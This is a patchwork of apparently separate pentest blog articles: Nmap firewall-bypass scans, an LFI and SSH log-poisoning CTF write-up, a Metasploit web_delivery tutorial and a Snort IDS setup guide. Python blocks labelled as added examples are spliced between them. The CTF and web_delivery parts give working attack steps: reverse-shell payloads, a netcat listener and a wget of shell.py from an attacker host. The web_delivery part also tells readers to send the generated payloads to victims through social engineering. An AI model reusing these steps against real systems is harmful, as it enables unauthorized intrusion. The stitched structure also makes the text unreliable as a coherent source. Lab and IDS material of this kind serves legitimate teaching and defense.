Understanding Guide to Nmap Firewall Scan (Part 2)

In our previous article, "Nmap Firewall Scan (Part 1)", we applied iptables rules and then tried to bypass the firewall filter with advanced Nmap scans. Today we discuss the second part.

Requirements
Attacker: Kali Linux
Target: Ubuntu

Allow TCP Packets from a Specific MAC Address

If a network admin wants to accept TCP connections only from a specific MAC address and reject every other system, he can apply the following iptables rules as a firewall filter on his network.

iptables -I INPUT -p tcp -m mac --mac-source "AA:AA:AA:AA:AA:AA" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset


Now when the attacker performs a basic network scan of the target, he is unable to enumerate the ports and running services of the victim's system.
nmap 192.168.1.117


Spoof MAC Address and Bypass Firewall
To bypass the filter applied above, the attacker may run netdiscover or an Nmap host scan from the Kali Linux terminal to identify the active hosts in the network. The result is a table containing the MAC address and IP address of each active host on the local network.


Now either try each MAC address one by one in the nmap command, or save all the MAC addresses in a text file and pass its path to nmap. Before doing so, the attacker first needs to enable promiscuous mode on his network interface. Type the commands below: the first enables promiscuous mode, the second runs the Nmap scan.
ip link set eth0 promisc on
nmap --spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence, if you are lucky enough to spoof the correct MAC address, you can easily bypass the firewall filter and establish a TCP connection to the victim's network for port enumeration.

Nice!!! In the image below you can observe the open ports of the target.


Allow TCP Packets from a Specific IP

If a network admin wants to accept TCP connections only from a specific IP address and reject every other system, he can apply the following iptables rules as a firewall filter on his network.

iptables -I INPUT -p tcp -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT


Now when the attacker again performs a basic network scan of the target, he is unable to enumerate the ports and running services of the victim's system.
nmap 192.168.1.117



Spoof IP Address and Bypass Firewall
To bypass the filter applied above, the attacker may again run netdiscover or an Nmap host scan from the Kali Linux terminal to identify the active hosts in the network. The result is a table containing the MAC address and IP address of each active host on the local network.

Now either try each IP address one by one in the nmap command, or save all the IP addresses in a text file and pass its path to nmap, then execute the following command:
nmap -e eth0 -S 192.168.1.120 192.168.1.117
Hence, if you are lucky enough to spoof the correct IP address, you can easily bypass the firewall filter and establish a TCP connection to the victim's network for port enumeration.

Great!! In the image below you can observe the open ports of the target.




Allow TCP Packets Containing a Specific String

If a network admin wants to accept TCP connections only from a system whose packets contain a specific string, and reject any packet that does not contain that string, he can apply the following iptables rules as a firewall filter on his network.

iptables -I INPUT -p tcp -m string --algo bm --string "Khulja sim sim" -j ACCEPT
iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In the rule above we used "Khulja sim sim" as the secret string for establishing a TCP connection. Hence only those TCP connections whose packets contain "Khulja sim sim" can be established.


Now when the attacker again performs a basic network scan of the target, he is unable to enumerate the ports and running services of the victim's system, because the traffic generated from his network does not contain the secret string, so the target's firewall discards all TCP packets from the attacker's network.
nmap 192.168.1.117


Use Nmap --data-string to Bypass the Firewall
If the attacker somehow sniffs the secret string "Khulja sim sim" used to connect to the target's network, he can use the --data-string argument in the nmap command to bypass the firewall.
nmap --data-string "Khulja sim sim" 192.168.1.117
Hence, if you are lucky enough to sniff the correct data string, you can easily bypass the firewall filter and establish a TCP connection to the victim's network for port enumeration.

Wonderful!! In the image below you can observe the open ports of the target.


Allow TCP Packets Containing a Specific Hex String

If a network admin wants to accept TCP connections only from a system whose packets contain the hexadecimal value of a particular string, and reject any packet that does not contain it, he can apply the following iptables rules as a firewall filter on his network.

iptables -I INPUT -p tcp -m string --algo kmp --hex-string "RAJ" -j ACCEPT
iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In the rule above we used the hex value of "RAJ" as the secret string for establishing a TCP connection. Hence only those TCP connections whose packets contain the hex value of "RAJ" can be established.
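The MAC, IP, string and hex-string filters above all rely on the same two iptables behaviours: `-I` (with no rule number) inserts a rule at the top of the chain while `-A` appends it at the bottom, and the first matching rule decides the verdict. The following model of an INPUT chain is an added example, not code from the original article: the `Packet` and `Rule` classes, the `--hex-string` decoder and the sample packets are constructed for illustration, and every packet is assumed to be TCP. It also shows what happens when both rules are inserted with `-I`: the REJECT ends up above the ACCEPT and even the allowed host is blocked.

```python
"""Model iptables INPUT-chain ordering for the MAC, IP and string filters above.

Added example, not from the original article. It reproduces two behaviours the
rules depend on: `-I` (no rule number) inserts at position 1 while `-A` appends,
and the first matching rule decides the verdict. Packets and rule sets below are
constructed for illustration; every packet is assumed to be TCP.
"""
from dataclasses import dataclass, field
from typing import Callable, List


@dataclass
class Packet:
    src_mac: str
    src_ip: str
    payload: bytes = b""


@dataclass
class Rule:
    target: str                      # "ACCEPT" or "REJECT"
    match: Callable[[Packet], bool]  # predicate standing in for the iptables match


@dataclass
class Chain:
    rules: List[Rule] = field(default_factory=list)

    def insert(self, rule: Rule) -> None:  # iptables -I: becomes rule 1
        self.rules.insert(0, rule)

    def append(self, rule: Rule) -> None:  # iptables -A: becomes the last rule
        self.rules.append(rule)

    def verdict(self, pkt: Packet, policy: str = "ACCEPT") -> str:
        """First matching rule wins; otherwise the chain policy applies."""
        for rule in self.rules:
            if rule.match(pkt):
                return rule.target
        return policy


def any_tcp(_: Packet) -> bool:  # `-p tcp` with no further match
    return True


def mac_source(mac: str) -> Callable[[Packet], bool]:  # -m mac --mac-source
    return lambda p: p.src_mac.lower() == mac.lower()


def src_ip(ip: str) -> Callable[[Packet], bool]:  # -s <ip>
    return lambda p: p.src_ip == ip


def parse_hex_string(spec: str) -> bytes:
    """Decode `--hex-string` notation: literal text with |xx xx| hex runs.
    Both "RAJ" and "|52 41 4a|" decode to b"RAJ"."""
    out = bytearray()
    i = 0
    while i < len(spec):
        if spec[i] == "|":
            end = spec.index("|", i + 1)
            out += bytes.fromhex(spec[i + 1:end])
            i = end + 1
        else:
            out += spec[i].encode("latin-1")
            i += 1
    return bytes(out)


def payload_contains(spec: str) -> Callable[[Packet], bool]:  # -m string --hex-string
    needle = parse_hex_string(spec)
    return lambda p: needle in p.payload


def allow_then_reject(match: Callable[[Packet], bool]) -> Chain:
    """ACCEPT inserted, REJECT appended: the allow rule sits above the reject."""
    chain = Chain()
    chain.insert(Rule("ACCEPT", match))
    chain.append(Rule("REJECT", any_tcp))
    return chain


def both_inserted(match: Callable[[Packet], bool]) -> Chain:
    """Both rules added with -I in the order ACCEPT, REJECT: the REJECT lands on top."""
    chain = Chain()
    chain.insert(Rule("ACCEPT", match))
    chain.insert(Rule("REJECT", any_tcp))
    return chain


def demo() -> dict:
    # Constructed packets: one from the permitted host, one from anywhere else.
    allowed = Packet("AA:AA:AA:AA:AA:AA", "192.168.1.120", b"GET / Khulja sim sim")
    other = Packet("BB:BB:BB:BB:BB:BB", "192.168.1.99", b"GET / HTTP/1.0")
    return {
        "mac_allowed": allow_then_reject(mac_source("AA:AA:AA:AA:AA:AA")).verdict(allowed),
        "mac_other": allow_then_reject(mac_source("AA:AA:AA:AA:AA:AA")).verdict(other),
        "mac_misordered": both_inserted(mac_source("AA:AA:AA:AA:AA:AA")).verdict(allowed),
        "ip_allowed": allow_then_reject(src_ip("192.168.1.120")).verdict(allowed),
        "string_allowed": allow_then_reject(payload_contains("Khulja sim sim")).verdict(allowed),
        "hex_other": allow_then_reject(payload_contains("|52 41 4a|")).verdict(other),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15} -> {result}")
```

Checking the live chain with `iptables -S INPUT` (or `iptables -L INPUT --line-numbers`) after adding rules shows the same ordering the model predicts; the `mac_misordered` case is the one to look for when an allow rule appears not to work.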


Now when the attacker again performs a basic network scan of the target, he is unable to enumerate the ports and running services of the victim's system, because the traffic generated from his network does not contain the hex value of the secret string, so the target's firewall discards all TCP packets from the attacker's network.
nmap 192.168.1.117


Use Nmap --data to Bypass the Firewall
If the attacker somehow sniffs the secret string "RAJ" used to connect to the target's network, he can pass its hex value with the --data argument in the nmap command to bypass the firewall.
nmap --data "\x52\x41\x4a" 192.168.1.117
Hence, if you are lucky enough to sniff the correct hex value of the data string, you can easily bypass the firewall filter and establish a TCP connection to the victim's network for port enumeration.

Hence, in the image below you can observe the open ports of the target.


Reject TCP Packets Containing a tcp-option
By default Nmap sends 24 bytes of TCP data, of which 4 bytes are reserved for TCP options. A network admin can reject packets carrying that TCP option to drop the connection and prevent his network from being scanned. Type the following iptables rule to reject packets with TCP option 4:

iptables -A INPUT -p tcp --tcp-option 4 -j REJECT --reject-with tcp-reset


Now when the attacker performs a TCP connect scan [-sT] of the target, he is unable to enumerate the ports and running services of the victim's system: the packets carry TCP option 4, so the firewall discards them.
nmap -sT 192.168.1.117


Use Nmap --ip-options to Bypass the TCP-Option Filter
The IP protocol offers numerous options that can be placed in packet headers. Unlike the omnipresent TCP options, IP options are seldom seen, for security reasons. The most powerful way to specify IP options is to pass raw hexadecimal data as the argument to --ip-options.

Precede every hex byte value with \x. You may repeat a byte by following it with an asterisk and the number of times it should repeat. For example, \x01\x07\x04\x00*4 is the same as \x01\x07\x04\x00\x00\x00\x00; the zero bytes are also called NULL bytes.

Now type the following command with the --ip-options argument:
nmap --ip-options "\x00\x00\x00\x00\x00*" 192.168.1.117

Note that if you specify a number of bytes that is not a multiple of four, an incorrect IP header length will be set in the IP packet. The reason is that the IP header length field can only express multiples of four. In those cases, the length is computed by dividing the header length by 4 and rounding down.
GOOD! In the image below you can observe the open ports of the target.

https://nmap.org/book/nping-man-ip-options.html
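The \x hex notation, the *N repeat shorthand and the rounding rule for the IP header length described above are easy to get wrong by hand. The following parser is an added example, not code from the original article or from Nmap: it expands the notation into bytes, computes the IHL value a 32-bit-word header length field can actually hold, reports how many option bytes fall outside it, and pads the options to the next word boundary as RFC 791 requires. The inputs at the bottom are constructed.

```python
"""Expand --ip-options hex notation and compute the resulting IP header length.

Added example, not from the original article. It implements the notation
described above (`\\xHH` bytes, optional `*N` repeat) and the IHL rounding
rule: the header length field counts 32-bit words, so option bytes past the
last whole word are not covered by it. Inputs at the bottom are constructed.
"""
import re
from typing import Dict

# One \xHH token with an optional *N repeat count.
TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})(?:\*(\d+))?")


def expand_ip_options(spec: str) -> bytes:
    r"""'\x01\x07\x04\x00*4' -> b'\x01\x07\x04\x00\x00\x00\x00'.
    Anything other than \xHH tokens (each with an optional *N) is rejected,
    including a trailing '*' with no count."""
    out = bytearray()
    pos = 0
    for m in TOKEN.finditer(spec):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}: {spec[pos:m.start()]!r}")
        repeat = int(m.group(2)) if m.group(2) else 1
        out += bytes([int(m.group(1), 16)]) * repeat
        pos = m.end()
    if pos != len(spec):
        raise ValueError(f"unexpected text at offset {pos}: {spec[pos:]!r}")
    return bytes(out)


def ip_header_length(options: bytes) -> Dict[str, int]:
    """IHL = floor((20 + len(options)) / 4), exactly the rounding the text warns about."""
    ihl = (20 + len(options)) // 4
    covered = ihl * 4 - 20
    return {
        "ihl": ihl,                      # value written into the 4-bit IHL field
        "header_bytes": ihl * 4,         # header length a receiver will believe
        "option_bytes_covered": covered,
        "option_bytes_uncovered": len(options) - covered,
    }


def pad_ip_options(options: bytes) -> bytes:
    """Pad with zero bytes (End of Option List) up to the next 32-bit boundary,
    as RFC 791 requires, so the IHL covers every option byte."""
    return options + b"\x00" * (-len(options) % 4)


if __name__ == "__main__":
    raw = expand_ip_options(r"\x01\x07\x04\x00*4")   # 7 option bytes
    print(raw.hex(), ip_header_length(raw))
    padded = pad_ip_options(raw)                      # 8 option bytes
    print(padded.hex(), ip_header_length(padded))
```

With the 7-byte example from the text the IHL comes out as 6 (a 24-byte header), so three of the seven option bytes lie beyond what the header length field claims; padding to 8 bytes raises the IHL to 7 and covers them all. The parser deliberately rejects a bare `*` with no count rather than guessing a repeat value.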


Hack The Ether: EvilScience VM (CTF challenge)

Hello friends! Today we are going to take on another CTF challenge, The Ether: EvilScience. Credit for making this VM goes to "f1re_w1re"; it is another boot2root challenge where we have to root the server to complete it. You can download this VM here.
Let's Breach!!!
Let us start by finding the IP of the VM (here I have it at 192.168.1.146, but you will have to find your own).

netdiscover
nmap -sV 192.168.1.146
The Nmap scan shows that port 80 is open, so we open the IP address in our browser.
Going through the pages, we find that index.php is vulnerable to LFI.


We can read auth.log through the LFI. Using Burp Suite to inspect the response, we find that we can use SSH log poisoning to get access to the server.


We now log in over SSH with a basic PHP shell as the username.
ssh ''@192.168.1.146


Now we check whether log injection is possible: we try to run the 'ls' command and find that it works.
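SSH log poisoning works because sshd copies a rejected username verbatim into auth.log, and the LFI then lets the web server interpret that file. From the defender's side both steps leave a trace. The following detector is an added example, not part of the write-up: it flags auth.log entries whose rejected username contains script markup, flags access-log requests whose (URL-decoded) path points at local files, and correlates the two by source address. The log lines, host name and addresses are constructed samples.

```python
"""Detect SSH log poisoning and the LFI read that triggers it.

Added example, not from the CTF write-up. sshd copies a rejected username
verbatim into auth.log, which is why a username containing PHP tags is a
high-confidence indicator; the same source reading auth.log through a
web parameter closes the loop. All log lines below are constructed samples.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# "Invalid user <name> from <ip>": the name is logged unescaped.
INVALID_USER = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Invalid user (?P<user>.*) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})"
)
# Markup that has no business in an account name.
SCRIPT_MARKUP = re.compile(r"<\?|\?>|<script|<%", re.IGNORECASE)

# Combined-format access log line; only the fields used here are captured.
ACCESS_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LFI_HINT = re.compile(r"\.\./|/var/log/|/etc/passwd|/proc/self/", re.IGNORECASE)

# Constructed sample logs (not taken from the VM).
SAMPLE_AUTH_LOG = """\
Jan  4 10:12:01 ether sshd[1402]: Invalid user admin from 192.168.1.50
Jan  4 10:12:09 ether sshd[1410]: Failed password for invalid user admin from 192.168.1.50 port 51022 ssh2
Jan  4 10:13:44 ether sshd[1433]: Invalid user <?php echo "poisoned"; ?> from 192.168.1.131
Jan  4 10:14:02 ether sshd[1440]: Accepted publickey for raj from 192.168.1.7 port 50112 ssh2
"""

SAMPLE_ACCESS_LOG = """\
192.168.1.50 - - [04/Jan/2018:10:11:58 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 1543
192.168.1.131 - - [04/Jan/2018:10:13:50 +0000] "GET /index.php?file=%2Fvar%2Flog%2Fauth.log HTTP/1.1" 200 8821
192.168.1.7 - - [04/Jan/2018:10:14:30 +0000] "GET /images/logo.png HTTP/1.1" 200 4410
"""


def find_poisoned_logins(text: str) -> List[Dict[str, str]]:
    """auth.log lines whose rejected username carries script markup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = INVALID_USER.match(line)
        if m and SCRIPT_MARKUP.search(m.group("user")):
            hits.append({"line": str(n), "src": m.group("src"), "user": m.group("user")})
    return hits


def find_lfi_requests(text: str) -> List[Dict[str, str]]:
    """Access-log requests whose URL-decoded path points at local files."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        path = unquote(m.group("path"))  # decode %2F etc. before matching
        if LFI_HINT.search(path):
            hits.append({"line": str(n), "src": m.group("src"), "path": path})
    return hits


def correlate(auth_hits: List[Dict[str, str]], web_hits: List[Dict[str, str]]) -> List[str]:
    """Sources that both poisoned auth.log and read it back through the web app."""
    return sorted({h["src"] for h in auth_hits} & {h["src"] for h in web_hits})


if __name__ == "__main__":
    poisoned = find_poisoned_logins(SAMPLE_AUTH_LOG)
    lfi = find_lfi_requests(SAMPLE_ACCESS_LOG)
    print(poisoned, lfi, correlate(poisoned, lfi), sep="\n")
```

On the sample data the poisoned login and the auth.log read come from the same address, which is the pattern to alert on; either signal alone is already worth a look, since neither has a benign explanation.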


We use web_delivery script in metasploit to gain reverse shell.
msf > use multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.131
msf exploit(web_delivery) > set lport 4444
msf exploit(web_delivery) > run




As soon as we send the request, we get the reverse shell.


python -c 'import pty; pty.spawn("/bin/bash");'


Now we take a look at the sudoers file. We find that we do not need a password to run a Python file as root.


Now we run the file as root. When we run it we find that it opens a log file, so we use a pipe to run our commands. We run the id command and find that we can execute commands as root.


Now we set up our listener using netcat.
nc -lvp 5555


Now we create a Python reverse shell and save it in our /var/www/html folder.



We download it into the /tmp folder on the target VM using wget.
wget http://192.168.1.108/shell.py -O /tmp/shell.py


Let's run the shell with python.


As soon as we run the script we get the reverse shell. We run the id command to check the user, move to the root directory and find an image file called flag.png.


We check the strings inside the image using the tail command.
tail flag.png
Inside the image file we find a flag in base64 encoding.


echo 'base64-encoded-string' | base64 -d


Command Injection Exploitation using Web Delivery (Linux, Windows)

Hello friends! In this article you will learn how to exploit three different platforms [Linux, Windows, PHP] using a single exploit of the Metasploit framework.

Requirements
Attacker: Kali Linux
Targeted platforms: Windows, PHP, Linux [Ubuntu]

Open the terminal in your Kali Linux, type "msfconsole" to load the Metasploit framework and execute the exploit given below.

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>show targets


From the image below you can observe that there are 5 targets, each of which generates malicious code to create a backdoor in the victim's system.


Exploit Linux platform [python]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of Kali Linux)
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 0
msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we set target 0 to generate malicious code for the Python platform. In the image below you can observe the highlighted malicious Python code; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in a terminal, the attacker obtains a meterpreter session, i.e. unauthorized access to the victim's system.


Exploit Web Server platform [PHP]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of kali Linux)
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
Now we set target 1 to generate malicious code for the PHP platform. In the image below you can observe the highlighted malicious PHP code; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in a web browser, the attacker obtains another meterpreter session, i.e. unauthorized access to the victim's system.


Exploit Windows platform [exe]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
Next we set target 2 to generate malicious code for the Windows platform. In the image below you can observe the highlighted malicious powershell.exe command; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in the command prompt, the attacker obtains a meterpreter session, i.e. unauthorized access to the victim's system.


use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we set target 3 to generate malicious code for the Windows platform. In the image below you can observe the highlighted malicious DLL code; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code as a command in the Run window, the attacker again obtains a meterpreter session and gains unauthorized access to the victim's system.


use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 4
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

In this exploit we set target 4 to generate malicious code for the Windows platform. In the image below you can observe the highlighted malicious powershell.exe binary code; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in the command prompt, the attacker obtains a meterpreter session, i.e. unauthorized access to the victim's system.
Hence a single exploit, the web delivery script, is quite helpful for hacking three different platforms.


IDS, IPS Penetration Testing Lab Setup with Snort

Hello friends! As you must be aware, IT organizations face various types of security issues daily. There are many firewalls, IDSs and third-party tools available to deal with the major security issues in a network.
In this article you will learn how to configure the well-known Snort as an IDS, as IT organizations use it, working as a real-time monitor.

Snort is software created by Martin Roesch that is widely used as an Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in networks. It is divided into five main components: packet decoder, preprocessors, detection engine, logging and alerting system, and output modules.

The program is well known for real-time traffic analysis and packet logging on Internet Protocol networks. By monitoring network traffic it detects probes and attacks such as denial of service attacks, port scans (including stealth port scans), buffer overflows and server message block probes.

Snort can be configured in three main modes:
· Sniffer mode: it observes network packets and presents them on the console.
· Packet logger mode: it records packets to disk.
· Intrusion detection mode: it monitors network traffic and analyzes it against a rule set defined by the user.
In intrusion detection mode the application then executes a specific action depending on what has been identified.

Let’s Begin!!

Snort Installation

We chose Ubuntu 14.04 for installing and configuring Snort. Before installing Snort on your machine, you need to install its dependencies. Open the terminal and type the command below to install the prerequisites:


sudo apt-get install -y build-essential libpcap-dev libpcre3-dev libdumbnet-dev bison flex zlib1g-dev



mkdir ~/snort_src && cd ~/snort_src

Snort needs the DAQ, or Data Acquisition library, for packet I/O. The DAQ replaces direct calls to libpcap functions with an abstraction layer that allows operation on a variety of hardware and software interfaces without requiring changes to Snort. The DAQ type and mode can be selected when invoking Snort, for pcap read-back or inline operation, etc. The DAQ library may also be useful for other packet processing applications, and its modular nature lets you build new modules for other platforms.
From the image below you can confirm that we successfully downloaded the daq-2.0.6 tar file.


Now execute the command below to extract the tar file.
tar xvfz daq-2.0.6.tar.gz


Move into the daq-2.0.6 folder with the first command below, then run the second command to configure, build and install it.
cd daq-2.0.6
./configure && make && sudo make install

Up to here you have learned how to install daq-2.0.6 for Snort.


From the image below you can confirm that we successfully downloaded the snort-2.9.11 tar file.


Now execute the command below to extract the tar file.
tar xvfz snort-2.9.11.tar.gz


Move into the snort-2.9.11 folder with the first command below, then run the second command to configure, build and install it.
cd snort-2.9.11
./configure --enable-sourcefire && make && sudo make install


Run the following command to update the shared library cache:
sudo ldconfig
Type the command below to create a symbolic link:
sudo ln -s /usr/local/bin/snort /usr/sbin/snort
A symbolic link, also known as a soft link, is a file system entry that points to another file's name and location. Deleting the symbolic link does not remove the original file. If, on the other hand, the file the soft link points to is removed, the soft link stops working: it is broken.


Now execute the command below so that Snort verifies its own installation by printing its version:
snort -V
The first part of the Snort installation ends here.


Configure Snort in IDS Mode on the Network
Execute the commands below to create the snort user and group; Snort will run as this unprivileged user.
sudo groupadd snort
sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort
The commands above create a group "snort" and add a user "snort" to it.


Next we need to create the directories Snort expects when running in IDS mode. Snort stores configuration files in /etc/snort, rules in /etc/snort/rules, compiled rules in /usr/local/lib/snort_dynamicrules, and its logs in /var/log/snort:

Type given below command to create the Snort directories:
sudo mkdir /etc/snort
sudo mkdir /etc/snort/rules
sudo mkdir /etc/snort/rules/iplists
sudo mkdir /etc/snort/preproc_rules
sudo mkdir /usr/local/lib/snort_dynamicrules
sudo mkdir /etc/snort/so_rules    


Type the commands below to create the files that store rules and IP lists:

sudo touch /etc/snort/rules/iplists/black_list.rules
sudo touch /etc/snort/rules/iplists/white_list.rules
sudo touch /etc/snort/rules/local.rules
sudo touch /etc/snort/sid-msg.map


Type given below command to create our logging directories:

sudo mkdir /var/log/snort
sudo mkdir /var/log/snort/archived_logs


Type given below command to adjust permissions:
sudo chmod -R 5775 /etc/snort
sudo chmod -R 5775 /var/log/snort
sudo chmod -R 5775 /var/log/snort/archived_logs
sudo chmod -R 5775 /etc/snort/so_rules
sudo chmod -R 5775 /usr/local/lib/snort_dynamicrules


Snort requires some configuration files and the dynamic preprocessors to be copied from the Snort source folder into /etc/snort, so execute the commands below.
cd ~/snort_src/snort-2.9.11/etc/
sudo cp *.conf* /etc/snort
sudo cp *.map /etc/snort
sudo cp *.dtd /etc/snort


cd ~/snort_src/snort-2.9.11/src/dynamic-preprocessors/build/usr/local/lib/snort_dynamicpreprocessor/
sudo cp * /usr/local/lib/snort_dynamicpreprocessor/


Editing the Snort configuration file
Now we need to comment out all the rule set includes with the following command:
sudo sed -i "s/include \$RULE\_PATH/#include \$RULE\_PATH/" /etc/snort/snort.conf

Then open the configuration file in gedit to make some changes.
sudo gedit /etc/snort/snort.conf


Scroll down to around line 45 and set the network you want to protect, as shown in the image:

# Setup the network addresses you are protecting
ipvar HOME_NET 192.168.1.1/24


Now scroll down to around line 108 and set the paths of the rule directories you created above for storing Snort rules, as shown in the image below.
var RULE_PATH /etc/snort/rules
var SO_RULE_PATH /etc/snort/so_rules
var PREPROC_RULE_PATH /etc/snort/preproc_rules
var WHITE_LIST_PATH /etc/snort/rules/iplists
var BLACK_LIST_PATH /etc/snort/rules/iplists


Scroll down once more to around line 546 and uncomment the highlighted line.
include $RULE_PATH/local.rules
Save and close the file once all the edits to the Snort configuration file are done.


Finally, run Snort in test mode; it parses the complete configuration file and validates the settings automatically, as shown in the image below:
sudo snort -T -i eth0 -c /etc/snort/snort.conf